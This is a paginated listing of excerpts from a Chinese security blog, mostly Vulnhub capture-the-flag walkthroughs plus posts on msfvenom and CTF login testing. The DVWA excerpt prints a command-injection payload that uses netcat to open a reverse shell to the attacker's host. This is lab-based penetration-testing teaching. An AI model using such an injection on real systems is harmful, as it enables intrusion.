上一页 1 ··· 12 13 14 15 16 17 18 19 20 ··· 48 下一页
摘要: MinU: V2 识别目标主机IP地址 (kali㉿kali)-[~/Vulnhub/MinUv2] └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24 Currently scanning: 192.168.56.0/24 | Screen View: 阅读全文
posted @ 2022-12-29 11:35 Jason_huawen 阅读(143) 评论(0) 推荐(0) 编辑
摘要: Command Execution 靶机基本情况 Metasploitable 2中的DVWA Level: Low 构造语句: ;nc -e /bin/bash 192.168.176.128 5555 其中192.168.176.128为Kali Linux IP 地址 可以成功拿到shell: 阅读全文
posted @ 2022-12-28 15:27 Jason_huawen 阅读(86) 评论(0) 推荐(0) 编辑
摘要: Momentum 识别目标主机IP地址 ─(kali㉿kali)-[~/Vulnhub/Momentum] └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24 Currently scanning: Finished! | Screen View: Uni 阅读全文
posted @ 2022-12-28 11:14 Jason_huawen 阅读(125) 评论(0) 推荐(0) 编辑
摘要: Ubuntu 18.04安装Docker步骤以及错误解决方法 sudo apt-get update sudo apt-get install \ ca-certificates \ curl \ gnupg \ lsb-release sudo mkdir -p /etc/apt/keyrings 阅读全文
posted @ 2022-12-27 16:51 Jason_huawen 阅读(716) 评论(0) 推荐(0) 编辑
摘要: MSFVENOM使用步骤 概述 MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom 包含标准的命令行选项。可以为许多平台生成有效 阅读全文
posted @ 2022-12-25 21:04 Jason_huawen 阅读(895) 评论(0) 推荐(0) 编辑
摘要: My CMSCMS 作者: Jason_huawen 靶机基本信息 名称:My CMSMS: 1 地址: 识别目标主机IP地址 ─(kali㉿kali)-[~/Vulnhub/MyCMSCMS] └─$ sudo netdiscover -i eth1 Currently scanning: 192 阅读全文
posted @ 2022-12-25 11:44 Jason_huawen 阅读(528) 评论(0) 推荐(0) 编辑
摘要: Napping 识别目标主机IP地址 ─(kali㉿kali)-[~/Vulnhub/napping] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.101.0/16 | Screen View: Unique Hosts 3 Ca 阅读全文
posted @ 2022-12-25 10:45 Jason_huawen 阅读(145) 评论(0) 推荐(0) 编辑
摘要: CTF中网站用户登录页面渗透测试步骤 CTF测试中经常遇到靶机的HTTP服务需要用户认证才能登录其后台,因此很多情况下需要绕开登录的认证限制或者得到用户名密码信息。按照优先级,对CTF中网站用户登录按下面的步骤进行尝试: 用弱密码登录,比如admin, root, password等。 查看页面源代 阅读全文
posted @ 2022-12-24 12:00 Jason_huawen 阅读(460) 评论(0) 推荐(0) 编辑
摘要: ReconForce 作者:jason_huawen 靶机基本信息 名称:ReconForce (v1.1) 地址: https://www.vulnhub.com/entry/hacknos-reconforce-v11,416/ 识别目标主机IP地址 ──(kali㉿kali)-[~/Vulnh 阅读全文
posted @ 2022-12-17 12:42 Jason_huawen 阅读(204) 评论(0) 推荐(0) 编辑
摘要: Replay 识别目标主机IP地址 (kali㉿kali)-[~/Vulnhub/Replay] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.64.0/16 | Screen View: Unique Hosts 3 Captur 阅读全文
posted @ 2022-12-16 18:51 Jason_huawen 阅读(69) 评论(0) 推荐(0) 编辑
上一页 1 ··· 12 13 14 15 16 17 18 19 20 ··· 48 下一页